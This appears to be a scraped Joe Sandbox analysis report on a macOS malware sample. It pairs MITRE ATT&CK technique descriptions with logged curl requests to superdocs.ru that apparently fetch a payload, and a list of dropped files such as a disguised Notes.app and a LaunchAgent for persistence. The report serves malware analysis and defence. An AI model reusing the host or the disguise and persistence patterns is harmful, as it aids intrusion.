Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /
Source: global traffic	HTTP traffic detected: GET /agent/bin/icons/Empty.icns HTTP/1.1Host: superdocs.ruUser-Agent: curl/7.79.1Accept: /

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse launchctl to execute commands or programs. Launchctl controls the macOS launchd process, which handles things like Launch Agent s and Launch Daemon s, but can execute other commands or programs itself. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents. These AppleEvent messages can be easily scripted with AppleScript for local or remote execution.
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may modify plist files to run a program during system boot or user login. Property list (plist) files contain all of the information that macOS and OS X uses to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as `/Library/Preferences` (which execute with elevated privileges) and `~/Library/Preferences` (which execute with a user's privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. Per Apple’s developer documentation, when a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (plist) files found in `/System/Library/LaunchAgents` , `/Library/LaunchAgents` , and `$HOME/Library/LaunchAgents` . These launch agents have property list files which point to the executables that will be launched . Adversaries may install a new launch agent that can be configured to execute at login by using launchd or launchctl to load a plist into the appropriate directories . The agent name may be disguised by using a name from a related operating system or benign software. Launch Agents are created with user level privileges and are executed with the privileges of the user when they log in . They can be set up to execute when a specific user logs in (in the specific user’s directory structure) or when any user logs in (which requires administrator privileges).
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. The certificates used during an operation may be created, acquired, or stolen by the adversary. Unlike Invalid Code Signature , this activity will result in a valid signature.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as Bash History and /var/log/*.
Tactics:	Defense Evasion
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

macOS Analysis Report exec.2430808

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Signatures

Initial Sample

Dropped Files

Snort Signatures

Joe Sandbox Signatures

Networking

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Created / dropped Files

/Users/pedro/Library/Caches/GitServices/.domain

/Users/pedro/Library/Caches/GitServices/.plist

/Users/pedro/Library/Caches/GitServices/.report

/Users/pedro/Library/Caches/GitServices/AppleWebKit

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Info.plist

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/MacOS/applet.cstemp

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/PkgInfo

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/Containers/a

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/a.scpt

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/Scripts/main.scpt

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.icns

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/Resources/applet.rsrc

/Users/pedro/Library/Group Containers/group.com.apple.mail/Notes.app/Contents/_CodeSignature/CodeResources

/Users/pedro/Library/LaunchAgents/com.apple.spx.plist

/dev/null

/private/var/tmp/sh-thd-1661359170

/private/var/tmp/sh-thd-2768930856

/private/var/tmp/sh-thd-4984095783

/private/var/tmp/sh-thd-4984109211

Static File Info

General

Static Mach Info

General Information for header 1

Internal Symbols

External Symbols

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

macOS Analysis Report
exec.2430808

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre